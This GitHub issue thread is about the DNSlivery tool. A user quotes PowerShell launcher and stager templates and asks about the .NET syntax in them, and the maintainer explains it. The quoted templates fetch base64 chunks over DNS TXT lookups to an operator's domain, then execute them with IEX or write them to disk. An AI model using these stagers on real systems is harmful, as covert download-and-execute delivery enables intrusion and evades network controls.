### ISSUE TITLE
what dose code between 132-138 means?

### ISSUE THREAD

**Issue by jiohb** [no0be/DNSlivery#6]
```python
 launcher_template = 'IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((1..%d|%%{Resolve-DnsName -ty TXT -na "%s.%s.$_.%s"|Where-Object Section -eq Answer|Select -Exp Strings}))))'

    stager_templates = {
        'print': '[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((1..%d|%%{do{$error.clear();Write-Host "[*] Resolving chunk $_/%d";Resolve-DnsName -ty TXT -na "%s.$_.%s"|Where-Object Section -eq Answer|Select -Exp Strings}until($error.count-eq0)})))',
        'exec': 'IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((1..%d|%%{do{$error.clear();Write-Host "[*] Resolving chunk $_/%d";Resolve-DnsName -ty TXT -na "%s.$_.%s"|Where-Object Section -eq Answer|Select -Exp Strings}until($error.count-eq0)}))))',
        'save': '[IO.File]::WriteAllBytes("$(Get-Location)\%s",[System.Convert]::FromBase64String((1..%d|%%{do{$error.clear();Write-Host "[*] Resolving chunk $_/%d";Resolve-DnsName -ty TXT -na "%s.$_.%s"|Where-Object Section -eq Answer|Select -Exp Strings}until($error.count-eq0)})))',
    }
```
I am poor at English, C# , powershell.
I tried to search on google, but i even don't know which keywords to use. Could you please tell me is "[System.Text.Encoding]" C# or powershell syntax, and what does it mean...

thanks you very much.

**Comment by no0be** [comment]
These are classes from the .NET framework that you can directly reference from PowerShell:
- https://docs.microsoft.com/en-us/dotnet/api/system.text.encoding?view=netframework-4.7.2
- https://docs.microsoft.com/en-us/dotnet/api/system.convert?view=netframework-4.7.2

Thus, it is actually .NET syntax used in PowerShell code. See [this article](https://mcpmag.com/articles/2015/11/04/net-members-in-powershell.aspx) for other examples.

**Comment by jiohb** [comment]
thank you a lot.
By the way, I find the powershell on mac and ubuntu doesn't have Resolve-DnsName command.
I am looking forward your shell version.
thank you for your great project. Totally light up my mind.

**Comment by no0be** [comment]
Thanks for the feedback! I will try to implement the bash target when possible.
